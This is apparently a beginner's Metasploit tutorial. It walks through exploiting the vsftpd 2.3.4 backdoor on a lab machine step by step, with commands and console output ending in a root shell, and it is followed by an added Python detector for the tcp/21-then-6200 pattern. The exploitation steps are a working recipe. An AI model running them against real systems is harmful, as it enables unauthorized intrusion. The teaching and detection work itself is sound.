Metasploit is a penetration testing toolkit that comes bundled with both Kali Linux and Parrot OS. It can also be downloaded here. Metasploit greatly simplifies the act of finding and testing well-known exploits and can save a penetration tester or security professional a massive amount of time compared with building these exploits by hand. It is user friendly, with just some basic syntax to learn before getting started. All the directions below apply to the Linux implementations of Metasploit.
Before Metasploit is run for the first time, the underlying PostgreSQL database needs to be started and initialized. Starting it can be accomplished by running
service postgresql start
Now that the database is up and running, we need to initialize it to work with Metasploit with the
msfdb init
command.
For the purposes of this demo we already know that there is an old Ubuntu machine running at IP address 192.168.0.108, which we believe may be vulnerable to a backdoor installed in the vsftpd program. The first thing we need to do, then, is find out whether Metasploit has an exploit for this vulnerability in its database. This is easy to do from the Metasploit console (msfconsole) with the command
search vsftp
When we run this, Metasploit returns one exploit:
Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
To set this as the exploit that we want to use we just run the command
use exploit/unix/ftp/vsftpd_234_backdoor
We know that it worked because the command prompt changes to include the exploit name:
msf5 exploit(unix/ftp/vsftpd_234_backdoor) >
Before we can run the exploit we need to set a few configuration details, and we can see what they are by running
show options
Metasploit responds by showing us exactly what information it needs, as can be seen below:
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic
The above tells us that we need to specify a host and a port for our target, and it even gives us a description of each option we need to enter. In this case we will only need to give it an IP address, since the port is already set to the default (21). To do so we run
set rhosts 192.168.0.108
If we were to run
show options
again, we would see that the RHOSTS field has been updated with the IP address we just entered.
If we think of an exploit as how we get in the door, then payloads are what we do once we are in the house. Not every payload will work with every exploit, so once our exploit is set, as it is now, we can run
show payloads
to see a list of compatible payloads. In this case we see
Compatible Payloads
===================

   #  Name               Disclosure Date  Rank    Check  Description
   -  ----               ---------------  ----    -----  -----------
   0  cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
This is an interactive Unix command shell on the target computer. To set this as the payload, we run the command
set payload cmd/unix/interact
Finally, to make sure we have everything set, we run
show options
one more time and check that everything looks right.
Once everything is set, running the exploit is as simple as running
exploit
which results in the following output:
[*] 192.168.0.108:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.108:21 - USER: 331 Please specify the password.
[+] 192.168.0.108:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.108:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.197:39837 -> 192.168.0.108:6200) at 2019-09-23 20:56:21 -0500

whoami
root
As can be seen above, when we ran the whoami command we got root, meaning we now have a root shell on the target computer.
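As an added defender-side example that is not part of the original post: the session output above shows the backdoor shell being opened on tcp/6200 of the target only seconds after the FTP connection to tcp/21. The Python below scans a constructed, simplified connection log (timestamp, source IP and port, destination IP and port, protocol) and flags any client that reaches tcp/6200 on a host within a short window of reaching tcp/21 on the same host. The log format and the 60-second window are assumptions.

```python
"""Correlate tcp/21 and tcp/6200 connections from the same client to the same
host, the pattern visible in the Metasploit session output above."""
from datetime import datetime, timedelta

# Constructed sample log, one connection per line:
# "timestamp src_ip src_port dst_ip dst_port proto"
SAMPLE_LOG = """\
2019-09-23T20:56:18-0500 192.168.0.197 52144 192.168.0.108 21 tcp
2019-09-23T20:56:19-0500 192.168.0.50 41000 192.168.0.108 21 tcp
2019-09-23T20:56:21-0500 192.168.0.197 39837 192.168.0.108 6200 tcp
2019-09-23T21:30:00-0500 192.168.0.50 41100 192.168.0.108 6200 tcp
"""

FTP_PORT = 21
BACKDOOR_PORT = 6200          # port seen in the "session opened" line above
WINDOW = timedelta(seconds=60)  # assumed correlation window

def parse_line(line):
    """Parse one whitespace-separated log line into a dict."""
    ts, src, sport, dst, dport, proto = line.split()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S%z"),
            "src": src, "sport": int(sport),
            "dst": dst, "dport": int(dport), "proto": proto}

def find_backdoor_sessions(log_text, window=WINDOW):
    """Return (src, dst, iso_timestamp) for every tcp/6200 connection that was
    preceded, within `window`, by a tcp/21 connection from the same src to the
    same dst. Connections to 6200 with no recent FTP contact are ignored."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    last_ftp = {}  # (src, dst) -> time of the most recent FTP connection
    hits = []
    for e in events:
        if e["proto"] != "tcp":
            continue
        key = (e["src"], e["dst"])
        if e["dport"] == FTP_PORT:
            last_ftp[key] = e["ts"]
        elif e["dport"] == BACKDOOR_PORT:
            seen = last_ftp.get(key)
            if seen is not None and e["ts"] - seen <= window:
                hits.append((e["src"], e["dst"], e["ts"].isoformat()))
    return hits

if __name__ == "__main__":
    for src, dst, ts in find_backdoor_sessions(SAMPLE_LOG):
        print(f"possible vsftpd backdoor shell: {src} -> {dst}:{BACKDOOR_PORT} at {ts}")
```

On the sample log only the 192.168.0.197 pair is flagged; the second client's tcp/6200 connection arrives half an hour after its FTP session and falls outside the window.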
There is a ton more that can be done with Metasploit, and this is literally just the tip of the iceberg as far as functionality goes. There are scanners, reverse shells, the Meterpreter shell, and even ways to group your projects and credentials, but this should be enough to get you started with the basic functionality. For more information and the full documentation, go to the Metasploit Docs.